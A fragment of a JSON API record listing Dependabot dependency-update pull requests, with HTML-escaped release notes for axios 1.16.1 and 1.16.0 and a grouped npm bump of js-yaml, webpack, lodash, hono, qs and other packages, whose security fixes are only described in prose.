tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.14.0...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 1.7.4 to 1.16.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.1 — May 13, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a defence-in-depth fix for prototype pollution in \u003ccode\u003eformDataToJSON\u003c/code\u003e, hardens proxy and CI workflows, restores Webpack 4 compatibility for the fetch adapter, and includes several small bug fixes and maintenance improvements.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Defence-in-Depth:\u003c/strong\u003e Hardened \u003ccode\u003eformDataToJSON\u003c/code\u003e against already-polluted \u003ccode\u003eObject.prototype\u003c/code\u003e by walking own properties only, so attacker-controlled keys inherited from a poisoned prototype cannot propagate through deserialization. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Cleartext Leak:\u003c/strong\u003e Fixed an issue where HTTPS request data could be transmitted in cleartext to an HTTP proxy under certain configurations. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10858\"\u003e#10858\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCI Cache Removal:\u003c/strong\u003e Removed all GitHub Actions caches as a defence-in-depth measure against cache poisoning vectors in the build pipeline. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10882\"\u003e#10882\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eData URI Parsing:\u003c/strong\u003e Updated the \u003ccode\u003efromDataURI\u003c/code\u003e regex to match RFC 2397 more strictly, fixing edge cases in \u003ccode\u003edata:\u003c/code\u003e URL handling. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10829\"\u003e#10829\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUnicode Headers:\u003c/strong\u003e Preserved Unicode header values when running through request interceptors, so non-ASCII header content is no longer corrupted before dispatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10850\"\u003e#10850\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXHR Upload Progress:\u003c/strong\u003e Guarded against malformed \u003ccode\u003eProgressEvent\u003c/code\u003e payloads emitted by some environments during XHR upload, preventing crashes when \u003ccode\u003eloaded\u003c/code\u003e / \u003ccode\u003etotal\u003c/code\u003e are missing or invalid. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10868\"\u003e#10868\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWebpack 4 Fetch Adapter:\u003c/strong\u003e Fixed an \u0026quot;unexpected token\u0026quot; error caused by syntax in the fetch adapter that Webpack 4 could not parse, restoring compatibility for legacy bundler users. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10864\"\u003e#10864\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eType Definitions:\u003c/strong\u003e Made \u003ccode\u003eparseReviver\u003c/code\u003e \u003ccode\u003econtext.source\u003c/code\u003e optional in the type definitions to align with the ES2023 specification. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10837\"\u003e#10837\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eURL Object Support Reverted:\u003c/strong\u003e Reverted the change that allowed passing a \u003ccode\u003eURL\u003c/code\u003e object as \u003ccode\u003econfig.url\u003c/code\u003e (originally \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10866\"\u003e#10866\u003c/a\u003e\u003c/strong\u003e) due to regressions; this support will be reintroduced in a later release once the underlying issues are addressed. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10874\"\u003e#10874\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCycle Detection Refactor:\u003c/strong\u003e Replaced the array-based cycle tracker in \u003ccode\u003etoJSONObject\u003c/code\u003e with a \u003ccode\u003eWeakSet\u003c/code\u003e, improving performance and memory behaviour on large nested structures. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10832\"\u003e#10832\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecomposeSignals Cleanup:\u003c/strong\u003e Refactored \u003ccode\u003ecomposeSignals\u003c/code\u003e to use a clearer early-return structure, simplifying the cancellation/abort composition path. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10844\"\u003e#10844\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAI Readiness \u0026amp; Repo Docs:\u003c/strong\u003e Added \u003ccode\u003eAGENTS.md\u003c/code\u003e and related contributor-guide updates for both human and AI agents, plus post-release documentation improvements. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10835\"\u003e#10835\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10841\"\u003e#10841\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocs Improvements:\u003c/strong\u003e Clarified the GET request example, fixed the interceptor \u003ccode\u003eeject\u003c/code\u003e example to reference the correct instance, and corrected the Buzzoid sponsor description in the README. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10836\"\u003e#10836\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10853\"\u003e#10853\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10856\"\u003e#10856\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSponsorship Tooling:\u003c/strong\u003e Fixed empty sponsor arrays in the sponsor processing script, added the ability to inject additional sponsors, updated the sponsorship link, and added a Twicsy advertisement entry. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10843\"\u003e#10843\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10859\"\u003e#10859\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10869\"\u003e#10869\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003e@commitlint/cli\u003c/code\u003e from 20.5.0 to 20.5.2. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10846\"\u003e#10846\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/hpinmetaverse\"\u003e\u003ccode\u003e@​hpinmetaverse\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10836\"\u003e#10836\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/tommyhgunz14\"\u003e\u003ccode\u003e@​tommyhgunz14\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10829\"\u003e#10829\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/divyanshuraj1095\"\u003e\u003ccode\u003e@​divyanshuraj1095\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10853\"\u003e#10853\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/sagodi97\"\u003e\u003ccode\u003e@​sagodi97\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10856\"\u003e#10856\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/rkdfx\"\u003e\u003ccode\u003e@​rkdfx\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10868\"\u003e#10868\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/Liuwei1125\"\u003e\u003ccode\u003e@​Liuwei1125\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10866\"\u003e#10866\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.16.0...v1.16.1\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.16.0 — May 2, 2026\u003c/h2\u003e\n\u003cp\u003eThis release adds support for the QUERY HTTP method and a new \u003ccode\u003eECONNREFUSED\u003c/code\u003e error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.\u003c/p\u003e\n\u003ch2\u003e⚠️ Notable Changes\u003c/h2\u003e\n\u003cp\u003eA handful of fixes in this release are either security-adjacent or change observable behaviour. Please review before upgrading:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.1 — May 13, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a defence-in-depth fix for prototype pollution in \u003ccode\u003eformDataToJSON\u003c/code\u003e, hardens proxy and CI workflows, restores Webpack 4 compatibility for the fetch adapter, and includes several small bug fixes and maintenance improvements.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Defence-in-Depth:\u003c/strong\u003e Hardened \u003ccode\u003eformDataToJSON\u003c/code\u003e against already-polluted \u003ccode\u003eObject.prototype\u003c/code\u003e by walking own properties only, so attacker-controlled keys inherited from a poisoned prototype cannot propagate through deserialization. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Cleartext Leak:\u003c/strong\u003e Fixed an issue where HTTPS request data could be transmitted in cleartext to an HTTP proxy under certain configurations. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10858\"\u003e#10858\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCI Cache Removal:\u003c/strong\u003e Removed all GitHub Actions caches as a defence-in-depth measure against cache poisoning vectors in the build pipeline. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10882\"\u003e#10882\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eData URI Parsing:\u003c/strong\u003e Updated the \u003ccode\u003efromDataURI\u003c/code\u003e regex to match RFC 2397 more strictly, fixing edge cases in \u003ccode\u003edata:\u003c/code\u003e URL handling. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10829\"\u003e#10829\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUnicode Headers:\u003c/strong\u003e Preserved Unicode header values when running through request interceptors, so non-ASCII header content is no longer corrupted before dispatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10850\"\u003e#10850\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXHR Upload Progress:\u003c/strong\u003e Guarded against malformed \u003ccode\u003eProgressEvent\u003c/code\u003e payloads emitted by some environments during XHR upload, preventing crashes when \u003ccode\u003eloaded\u003c/code\u003e / \u003ccode\u003etotal\u003c/code\u003e are missing or invalid. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10868\"\u003e#10868\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWebpack 4 Fetch Adapter:\u003c/strong\u003e Fixed an \u0026quot;unexpected token\u0026quot; error caused by syntax in the fetch adapter that Webpack 4 could not parse, restoring compatibility for legacy bundler users. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10864\"\u003e#10864\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eType Definitions:\u003c/strong\u003e Made \u003ccode\u003eparseReviver\u003c/code\u003e \u003ccode\u003econtext.source\u003c/code\u003e optional in the type definitions to align with the ES2023 specification. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10837\"\u003e#10837\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eURL Object Support Reverted:\u003c/strong\u003e Reverted the change that allowed passing a \u003ccode\u003eURL\u003c/code\u003e object as \u003ccode\u003econfig.url\u003c/code\u003e (originally \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10866\"\u003e#10866\u003c/a\u003e\u003c/strong\u003e) due to regressions; this support will be reintroduced in a later release once the underlying issues are addressed. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10874\"\u003e#10874\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCycle Detection Refactor:\u003c/strong\u003e Replaced the array-based cycle tracker in \u003ccode\u003etoJSONObject\u003c/code\u003e with a \u003ccode\u003eWeakSet\u003c/code\u003e, improving performance and memory behaviour on large nested structures. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10832\"\u003e#10832\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecomposeSignals Cleanup:\u003c/strong\u003e Refactored \u003ccode\u003ecomposeSignals\u003c/code\u003e to use a clearer early-return structure, simplifying the cancellation/abort composition path. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10844\"\u003e#10844\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAI Readiness \u0026amp; Repo Docs:\u003c/strong\u003e Added \u003ccode\u003eAGENTS.md\u003c/code\u003e and related contributor-guide updates for both human and AI agents, plus post-release documentation improvements. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10835\"\u003e#10835\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10841\"\u003e#10841\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocs Improvements:\u003c/strong\u003e Clarified the GET request example, fixed the interceptor \u003ccode\u003eeject\u003c/code\u003e example to reference the correct instance, and corrected the Buzzoid sponsor description in the README. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10836\"\u003e#10836\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10853\"\u003e#10853\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10856\"\u003e#10856\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSponsorship Tooling:\u003c/strong\u003e Fixed empty sponsor arrays in the sponsor processing script, added the ability to inject additional sponsors, updated the sponsorship link, and added a Twicsy advertisement entry. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10843\"\u003e#10843\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10859\"\u003e#10859\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10869\"\u003e#10869\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003e@commitlint/cli\u003c/code\u003e from 20.5.0 to 20.5.2. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10846\"\u003e#10846\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/hpinmetaverse\"\u003e\u003ccode\u003e@​hpinmetaverse\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10836\"\u003e#10836\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/tommyhgunz14\"\u003e\u003ccode\u003e@​tommyhgunz14\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10829\"\u003e#10829\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/divyanshuraj1095\"\u003e\u003ccode\u003e@​divyanshuraj1095\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10853\"\u003e#10853\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/sagodi97\"\u003e\u003ccode\u003e@​sagodi97\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10856\"\u003e#10856\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/rkdfx\"\u003e\u003ccode\u003e@​rkdfx\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10868\"\u003e#10868\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/Liuwei1125\"\u003e\u003ccode\u003e@​Liuwei1125\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10866\"\u003e#10866\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.16.0...v1.16.1\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.16.0 — May 2, 2026\u003c/h2\u003e\n\u003cp\u003eThis release adds support for the QUERY HTTP method and a new \u003ccode\u003eECONNREFUSED\u003c/code\u003e error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.\u003c/p...\n\n_Description has been truncated_","html_url":"https://github.com/Gaming-tech-cyber/react/pull/28","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gaming-tech-cyber%2Freact/issues/28","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/28/packages"}},{"old_version":"4.15.1","new_version":"5.2.4","update_type":"major","path":null,"pr_created_at":"2026-05-28T00:13:00.000Z","version_change":"4.15.1 → 5.2.4","issue":{"uuid":"4536647514","node_id":"PR_kwDOMhAMTs7gCj3n","number":142,"state":"open","title":"build(deps): bump the npm_and_yarn group across 7 directories with 11 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-28T00:13:00.000Z","updated_at":"2026-05-28T00:13:37.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"npm_and_yarn","update_count":11,"packages":[{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"react-router","old_version":"7.6.3","new_version":"7.12.0","repository_url":"https://github.com/remix-run/react-router"},{"name":"vite","old_version":"7.3.1","new_version":"7.3.2","repository_url":"https://github.com/vitejs/vite"},{"name":"webpack","old_version":"5.90.0","new_version":"5.104.1","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-dev-server","old_version":"4.15.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"lodash","old_version":"4.17.23","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"@hono/node-server","old_version":"1.19.11","new_version":"1.19.13","repository_url":"https://github.com/honojs/node-server"},{"name":"hono","old_version":"4.12.8","new_version":"4.12.18","repository_url":"https://github.com/honojs/hono"},{"name":"qs","old_version":"6.14.2","new_version":"6.15.2","repository_url":"https://github.com/ljharb/qs"},{"name":"storybook","old_version":"8.5.2","new_version":"8.6.17","repository_url":"https://github.com/storybookjs/storybook"},{"name":"happy-dom","old_version":"20.0.10","new_version":"20.8.9","repository_url":"https://github.com/capricorn86/happy-dom"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 11 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router) | `7.6.3` | `7.12.0` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `7.3.1` | `7.3.2` |\n| [webpack](https://github.com/webpack/webpack) | `5.90.0` | `5.104.1` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `4.15.1` | `5.2.4` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.23` | `4.18.1` |\n| [@hono/node-server](https://github.com/honojs/node-server) | `1.19.11` | `1.19.13` |\n| [hono](https://github.com/honojs/hono) | `4.12.8` | `4.12.18` |\n| [qs](https://github.com/ljharb/qs) | `6.14.2` | `6.15.2` |\n| [storybook](https://github.com/storybookjs/storybook/tree/HEAD/code/core) | `8.5.2` | `8.6.17` |\n| [happy-dom](https://github.com/capricorn86/happy-dom) | `20.0.10` | `20.8.9` |\n\nBumps the npm_and_yarn group with 4 updates in the /apps/extension directory: [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router), [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite), [webpack](https://github.com/webpack/webpack) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /apps/mobile directory: [lodash](https://github.com/lodash/lodash).\nBumps the npm_and_yarn group with 7 updates in the /apps/web directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router) | `7.6.3` | `7.12.0` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `7.3.1` | `7.3.2` |\n| [webpack](https://github.com/webpack/webpack) | `5.90.0` | `5.104.1` |\n| [@hono/node-server](https://github.com/honojs/node-server) | `1.19.11` | `1.19.13` |\n| [hono](https://github.com/honojs/hono) | `4.12.8` | `4.12.18` |\n| [qs](https://github.com/ljharb/qs) | `6.14.2` | `6.15.2` |\n| [storybook](https://github.com/storybookjs/storybook/tree/HEAD/code/core) | `8.5.2` | `8.6.17` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/sessions directory: [happy-dom](https://github.com/capricorn86/happy-dom).\nBumps the npm_and_yarn group with 3 updates in the /packages/uniswap directory: [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router), [lodash](https://github.com/lodash/lodash) and [qs](https://github.com/ljharb/qs).\nBumps the npm_and_yarn group with 1 update in the /packages/wallet directory: [lodash](https://github.com/lodash/lodash).\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca 